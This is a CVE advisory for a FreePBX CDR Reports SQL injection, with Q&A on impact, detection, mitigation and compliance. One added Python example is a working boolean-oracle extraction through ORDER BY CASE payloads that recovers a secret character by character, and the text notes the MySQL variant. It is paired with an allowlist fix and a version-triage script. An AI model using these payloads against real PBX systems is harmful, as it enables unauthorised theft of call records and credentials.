CVE-2026-44238
Status: Undergoing Analysis - In Progress
SQL Injection in FreePBX CDR Reports Module

Publication date: 2026-05-29

Last updated on: 2026-05-29

Assigner: GitHub, Inc.

Description
FreePBX is an open source IP PBX. Prior to 16.0.50 and 17.0.11, the CDR Reports module page allows SQL injection through the order and sort POST parameters. Authentication with a FreePBX Administration Control Panel account that has CDR section access is required. Full administrator privileges are not needed. This vulnerability is fixed in 16.0.50 and 17.0.11.
Affected Vendors & Products (2 associated CPEs)

Vendor    Product   Version / Range
freepbx   freepbx   16.x before 16.0.50 (16.0.50 itself is fixed)
freepbx   freepbx   17.x before 17.0.11 (17.0.11 itself is fixed)
CWE
CWE-89 (Improper Neutralization of Special Elements used in an SQL Command, 'SQL Injection'): The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-44238 is an authenticated SQL injection vulnerability in the CDR Reports module of FreePBX 16 (before 16.0.50) and FreePBX 17 (before 17.0.11). The `order` and `sort` POST parameters are interpolated directly into the ORDER BY clause of the report query instead of being checked against the set of sortable columns and the two valid directions.

The value is passed through `escapeSimple()`, which only escapes single quotes. That is the right defence for a value placed inside a quoted string literal, but a column name or sort direction in ORDER BY is not quoted, so a payload that contains no quote characters passes through unchanged and is executed as SQL. Escaping is the wrong tool here because identifiers and keywords cannot be bound as query parameters; they have to be validated against an allowlist.

To exploit this vulnerability, an attacker needs a FreePBX Administration Control Panel account with access to the CDR section. Full administrator rights are not required, so any low-privileged reporting user is a sufficient starting point.

Successful exploitation lets the attacker splice arbitrary SQL expressions into the query. An ORDER BY position does not return data directly, but a conditional expression that changes the sort order depending on a subquery turns the report page into a boolean oracle, and time-based expressions work the same way, so other rows and tables reachable by the application's database user can be extracted one bit at a time.
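The following Python example is added here to show why quote-only escaping fails in an ORDER BY position and what the allowlist fix looks like. It is not FreePBX code: the schema, column names, the `admins` table, the `escape_simple()` stand-in for `escapeSimple()`, and the leaked secret are all constructed for the example, and SQLite is used in place of the MySQL/MariaDB database FreePBX actually runs on. The `leak_secret()` function goes one step beyond the paragraph above by carrying the boolean oracle through to a full extraction of a string, character by character.

```python
import sqlite3

# Constructed in-memory schema standing in for a call-detail-record table plus a
# second table holding something worth stealing. Table and column names are
# invented for this example; they are not FreePBX's schema.
SETUP_SQL = """
CREATE TABLE cdr (calldate TEXT, src TEXT, dst TEXT, duration INTEGER);
INSERT INTO cdr VALUES ('2026-05-01 10:00:00', '1001', '2001', 30);
INSERT INTO cdr VALUES ('2026-05-01 11:00:00', '1002', '2002', 300);
INSERT INTO cdr VALUES ('2026-05-01 12:00:00', '1003', '2003', 3);
CREATE TABLE admins (username TEXT, secret TEXT);
INSERT INTO admins VALUES ('admin', 'hunter2');
"""


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SETUP_SQL)
    return conn


def escape_simple(value: str) -> str:
    """Quote-only escaping, a stand-in for PEAR-style escapeSimple() (assumed
    behaviour, not FreePBX code). Fine inside a quoted string literal, useless
    when the value is spliced into an unquoted ORDER BY position."""
    return value.replace("'", "\\'")


def query_vulnerable(conn, sort: str, order: str) -> list:
    """Builds ORDER BY by string interpolation after quote-escaping only."""
    sql = f"SELECT src FROM cdr ORDER BY {escape_simple(sort)} {escape_simple(order)}"
    return [row[0] for row in conn.execute(sql)]


ALLOWED_SORT = {"calldate", "src", "dst", "duration"}
ALLOWED_ORDER = {"ASC", "DESC"}


def query_hardened(conn, sort: str, order: str) -> list:
    """Identifiers cannot be bound as parameters, so validate them against an
    allowlist and interpolate only the allowlisted token itself."""
    if sort not in ALLOWED_SORT:
        raise ValueError(f"rejected sort column {sort!r}")
    direction = order.upper()
    if direction not in ALLOWED_ORDER:
        raise ValueError(f"rejected sort direction {order!r}")
    sql = f"SELECT src FROM cdr ORDER BY {sort} {direction}"
    return [row[0] for row in conn.execute(sql)]


# Sorting by duration ASC yields a different row order than sorting by calldate,
# so a CASE in the ORDER BY turns any boolean subquery into one observable bit.
DURATION_ORDER = ["1003", "1001", "1002"]


def oracle(conn, condition: str) -> bool:
    payload = f"(CASE WHEN {condition} THEN duration ELSE calldate END)"
    # The payload contains no single quote, so escape_simple() leaves it intact.
    return query_vulnerable(conn, payload, "ASC") == DURATION_ORDER


def leak_char(conn, pos: int) -> str:
    """Binary-search one printable-ASCII character of admins.secret."""
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        cond = f"(SELECT unicode(substr(secret, {pos}, 1)) FROM admins) > {mid}"
        if oracle(conn, cond):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def leak_secret(conn, length: int) -> str:
    return "".join(leak_char(conn, pos) for pos in range(1, length + 1))


if __name__ == "__main__":
    db = make_db()
    print("legitimate sort:", query_hardened(db, "duration", "asc"))
    print("leaked through vulnerable ORDER BY:", leak_secret(db, 7))
    try:
        query_hardened(db, "(CASE WHEN 1 THEN duration ELSE calldate END)", "asc")
    except ValueError as exc:
        print("hardened query rejected payload:", exc)
```

Each `oracle()` call is one POST to the report page with the CASE expression in `sort`; seven characters cost about seven requests per character, which is well within what an authenticated user can send unnoticed, and the same construction works against MySQL with `ORD(SUBSTRING(...))` in place of `unicode(substr(...))`.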


How can this vulnerability impact me?

This vulnerability allows an attacker who holds only a limited Administration Control Panel account to run SQL injection against the FreePBX database.

Such an attack can expose data the account was never granted in the web interface, starting with the call detail records themselves and extending to anything else readable by the application's database user, which compromises confidentiality.

Depending on what the database driver permits, it may also affect integrity by allowing records to be modified or deleted.

The attack is delivered over the network through the web administration interface and needs nothing beyond a low-privileged account, so it represents a high risk wherever such accounts exist or the interface is reachable from untrusted networks.

Mitigation is to update FreePBX to 16.0.50 or 17.0.11 or later, to limit who holds Administration Control Panel accounts with CDR access, and to restrict network access to the administration interface with the firewall.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

The injection travels in the `order` and `sort` POST parameters of the CDR Reports page, so detection has two parts: confirming whether the installed CDR module is older than the fixed version, and looking for injection attempts against that page.

Because exploitation requires an Administration Control Panel account with CDR section access, every attempt comes from an authenticated session, which narrows the search. Review logs for POST requests to the CDR Reports page whose `order` or `sort` values are anything other than a column name and `asc`/`desc`. Note that a standard web server access log records only the request line, not the POST body, so parameter values are visible only in a reverse proxy or WAF audit log that captures request bodies.

No specific detection commands are provided in the available resources.
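As an added example, not code from the page or from the FreePBX project, the following Python script triages a host by the installed CDR module version. It treats the fixed versions as CDR module versions, which the advisory does not state explicitly, and compares them per major branch so that 16.0.9 is correctly read as older than 16.0.50. The pipe-delimited `fwconsole ma list` table shape and its column positions are an assumption, and the sample output is constructed; on a real FreePBX host the script runs the command, elsewhere it falls back to the sample.

```python
import re
import subprocess
from typing import Optional, Tuple

# Fixed versions from the advisory, keyed by major branch.
FIXED_VERSIONS = {16: (16, 0, 50), 17: (17, 0, 11)}


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '16.0.49' (or '17.0.11.2') into an integer tuple for comparison."""
    match = re.match(r"(\d+(?:\.\d+)*)", text.strip())
    if not match:
        raise ValueError(f"unparseable version {text!r}")
    return tuple(int(p) for p in match.group(1).split("."))


def triage(version: str) -> str:
    """'vulnerable', 'fixed', or 'unknown' for a branch the advisory does not name."""
    v = parse_version(version)
    fixed = FIXED_VERSIONS.get(v[0])
    if fixed is None:
        return "unknown"
    return "fixed" if v >= fixed else "vulnerable"


# Constructed sample in the assumed table layout; a real `fwconsole ma list`
# may lay the columns out differently.
SAMPLE_MA_LIST = """\
+----------------+---------+---------+---------+
| Module         | Version | Status  | License |
+----------------+---------+---------+---------+
| cdr            | 16.0.49 | Enabled | GPLv3+  |
| framework      | 16.0.40 | Enabled | GPLv3+  |
+----------------+---------+---------+---------+
"""


def find_module_version(ma_list_output: str, module: str) -> Optional[str]:
    """Return the version cell for `module`, or None if it is not listed."""
    for line in ma_list_output.splitlines():
        if not line.startswith("|"):
            continue  # border rows
        cells = [c.strip() for c in line.strip("|").split("|")]
        if len(cells) >= 2 and cells[0] == module:
            return cells[1]
    return None


def triage_host(ma_list_output: str) -> str:
    version = find_module_version(ma_list_output, "cdr")
    if version is None:
        return "cdr module not installed"
    return f"cdr {version}: {triage(version)}"


if __name__ == "__main__":
    try:
        output = subprocess.run(["fwconsole", "ma", "list"], capture_output=True,
                                text=True, check=True).stdout
    except (FileNotFoundError, subprocess.CalledProcessError):
        output = SAMPLE_MA_LIST  # not on a FreePBX host: use the constructed sample
    print(triage_host(output))
```

A result of "unknown" (for example a 15.x module) means the advisory says nothing about that branch, not that it is safe; check the vendor's release notes for it separately.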


What immediate steps should I take to mitigate this vulnerability?

The primary mitigation is to update the CDR Reports module to 16.0.50 or later on FreePBX 16, or 17.0.11 or later on FreePBX 17, where the `order` and `sort` parameters are validated before use. The update can be applied from Module Admin in the GUI or with `fwconsole ma upgrade cdr` on the host; confirm the installed version afterwards with `fwconsole ma list`.

  • Review which Administration Control Panel accounts have been granted access to the CDR section and remove it where it is not needed; every such account is a potential launch point until the module is patched.
  • Use the FreePBX Firewall module to block hostile networks from reaching the administration interface, so that only trusted management networks can log in at all.

How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

This vulnerability allows an attacker holding an Administration Control Panel account with CDR section access to perform SQL injection and read data from the FreePBX database beyond what the interface exposes.

Call detail records link phone numbers to the time and duration of calls, which is personal data under GDPR and may be protected health information where the PBX serves a covered entity under HIPAA. Exposure of that data through this vulnerability can therefore amount to a reportable breach under those regulations, which require personal and health-related information to be protected from unauthorized access.

If exploited, the vulnerability compromises the confidentiality and potentially the integrity of that data, and an unpatched, reachable system is also a finding in its own right under the patch-management controls those standards expect.

